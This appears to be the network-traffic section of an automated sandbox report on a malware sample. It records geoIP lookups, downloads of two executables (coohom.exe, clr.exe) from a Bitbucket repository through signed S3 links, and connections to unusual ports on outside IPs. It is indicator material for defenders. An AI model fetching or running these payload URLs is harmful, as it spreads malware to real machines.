Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.141.1 | |
bbuseruploads.s3.amazonaws.com |
CNAME
s3-1-w.amazonaws.com
|
52.216.152.244 |
api.ip.sb | 104.26.13.31 |
- TCP Requests
-
-
192.168.56.102:49818 104.192.141.1:443bitbucket.org
-
192.168.56.102:49811 104.26.13.31:443api.ip.sb
-
192.168.56.102:49832 104.26.13.31:443api.ip.sb
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49810 185.153.198.36:10202
-
192.168.56.102:49819 52.216.30.156:443bbuseruploads.s3.amazonaws.com
-
192.168.56.102:49831 74.119.193.164:3214
-
- UDP Requests
-
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:56758 239.255.255.250:3702
-
GET
200
https://api.ip.sb/geoip
REQUEST
RESPONSE
BODY
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:39:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 349
Connection: keep-alive
Set-Cookie: __cfduid=d9e9d9dcbf0effcd13a3574cb0a3fb83e1616402392; expires=Wed, 21-Apr-21 08:39:52 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 08fab03e4d0000eb91809d2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=f4gQJqMOiq2FkL%2B5fJRZMZs1RgilJkh41HKc1AXxIrRTn3HeeXo525M4CstmcuoDR1e87EPYap89%2BcDCFjeZANBdJACC2Pj9voo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 633e1caa1ca1eb91-LAX
GET
302
https://bitbucket.org/mminminminmin05/testtest/downloads/coohom.exe
REQUEST
RESPONSE
BODY
GET /mminminminmin05/testtest/downloads/coohom.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
HTTP/1.1 302 Found
Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
Vary: Accept-Language, Cookie
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: 6b5531fcaa10830a
X-Dc-Location: ash2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 22 Mar 2021 08:40:03 GMT
Location: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22
X-Served-By: app-3021
Expires: Mon, 22 Mar 2021 08:40:03 GMT
Content-Language: en
X-Static-Version: 7d7e05cb8b56
X-Content-Type-Options: nosniff
X-Render-Time: 0.0390648841858
Connection: Keep-Alive
X-Request-Count: 2532
X-Frame-Options: SAMEORIGIN
X-Version: 7d7e05cb8b56
DC-Location: ash2
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET
200
https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22
REQUEST
RESPONSE
BODY
GET /17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: KARKJjXXCbR8SAMAjNcskRPUWH5LywNXYaA+WJYyxHxVILTDdga4Vm/GcKWZKFMUwWrTz4Cg9CI=
x-amz-request-id: BRJCCBTW4D27VXZV
Date: Mon, 22 Mar 2021 08:40:05 GMT
Last-Modified: Sun, 21 Mar 2021 23:08:12 GMT
ETag: "5ca4b0570d73158cc763c46042b46115-2"
x-amz-version-id: vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj
Content-Disposition: attachment; filename="coohom.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 9545648
Server: AmazonS3
GET
302
https://bitbucket.org/mminminminmin05/testtest/downloads/clr.exe
REQUEST
RESPONSE
BODY
GET /mminminminmin05/testtest/downloads/clr.exe HTTP/1.1
Host: bitbucket.org
HTTP/1.1 302 Found
Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
Vary: Accept-Language, Cookie
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: d88c3891fe39818e
X-Dc-Location: ash2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 22 Mar 2021 08:40:12 GMT
Location: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22
X-Served-By: app-3015
Expires: Mon, 22 Mar 2021 08:40:12 GMT
Content-Language: en
X-Static-Version: 7d7e05cb8b56
X-Content-Type-Options: nosniff
X-Render-Time: 0.034187078476
Connection: Keep-Alive
X-Request-Count: 1824
X-Frame-Options: SAMEORIGIN
X-Version: 7d7e05cb8b56
DC-Location: ash2
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET
200
https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22
REQUEST
RESPONSE
BODY
GET /17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
HTTP/1.1 200 OK
x-amz-id-2: 5ztc37tsGARSN+tuBIuKytRcjNOQOtlrjOt2cYawjTGl7EuZICy9i3yp7ONK5CPdw2NR6QpgMqA=
x-amz-request-id: WE4Y6BJCJJMQ4A48
Date: Mon, 22 Mar 2021 08:40:13 GMT
Last-Modified: Sun, 21 Mar 2021 23:06:33 GMT
ETag: "3a7d2f1815f84f8f678af316d2475e34"
x-amz-version-id: navAx2o.B364539FO2C5fA3kQTj_uTIH
Content-Disposition: attachment; filename="clr.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 209408
Server: AmazonS3
GET
200
https://api.ip.sb/geoip
REQUEST
RESPONSE
BODY
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:40:26 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 349
Connection: keep-alive
Set-Cookie: __cfduid=d6e230580ab92435cb7056c4f5b6292841616402425; expires=Wed, 21-Apr-21 08:40:25 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 08fab0bf7b000098213d02f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=a3bCWz1CN9%2B9BoxvzHeIMlps%2FG1bs4pKlHz4P3mSBu%2BrY485N2VUUQkzAxCt9%2BS7pmaEkNrPsO8JqFlvFzXf3JEZrCMcL%2B0t%2BXc%3D"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 633e1d78cfe09821-LAX
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49811 104.26.13.31:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
TLS 1.2 192.168.56.102:49818 104.192.141.1:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org | 4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0 |
TLS 1.2 192.168.56.102:49819 52.216.30.156:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2 | C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=*.s3.amazonaws.com | 90:e0:af:dc:fa:f7:0b:ac:50:bb:fa:43:e1:ec:e2:3d:ce:91:90:47 |
TLSv1 192.168.56.102:49832 104.26.13.31:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
Snort Alerts
No Snort Alerts